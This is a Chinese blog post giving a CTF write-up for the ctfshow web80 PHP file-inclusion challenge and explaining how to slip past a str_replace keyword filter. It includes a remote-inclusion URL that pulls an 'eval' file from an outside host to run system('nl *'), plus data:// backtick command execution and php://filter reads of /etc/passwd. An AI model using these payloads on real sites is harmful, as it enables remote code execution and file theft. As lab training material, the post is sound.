php文件包含-CTFshow-web80

0 前言

前面我通过 2 个 CTF 题目来讲解了各种协议在文件包含时的简单用法。这篇文章主要是对 web80 做个简要的分析。

1 解题思路

在 web79 中只过滤了 php,而在 web80 中过滤了 phpdata。两个题都是使用 str_replace 进行过滤,所以 web80 的思路和 web79 是一样的。

  1. 利用大小写绕过 str_replace 函数。(经过测试data 协议无法使用 DATA 绕过。php 伪协议则只能使用 php://input 协议,不能使用 php://filter)。
  2. 使用其他协议,尽量避免使用关键字。

2 Payload

这里只进行简单介绍,具体做法参考 web79

2.1 http://

将题目的 URL 进行替换后访问链接,查看网页源码即可获得flag。

http://46399124-ff7e-4684-8e6b-e48ce59c51d8.challenge.ctf.show:8080/?file=https://blog-1256032382.cos.ap-nanjing.myqcloud.com/eval&code=system('nl *');

2.2 data://

关于 data 协议的测试代码:

<?php

include("DATA:text/plain,<?=`nl *`?>"); // 无法执行
include("data:text/plain,<?=`nl *`?>"); // 正常执行
include("PHP://filter/convert.base64-encode/resource=/etc/passwd"); // 正常执行
include("php://filter/convert.base64-encode/resource=/etc/shells"); // 正常执行

?>

3 总结

php 使用大小写都可以执行,data 使用小写可以执行,使用大写却不可以。感觉这种设计好奇怪呐。

果然,实践是检验真理的唯一标准。

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值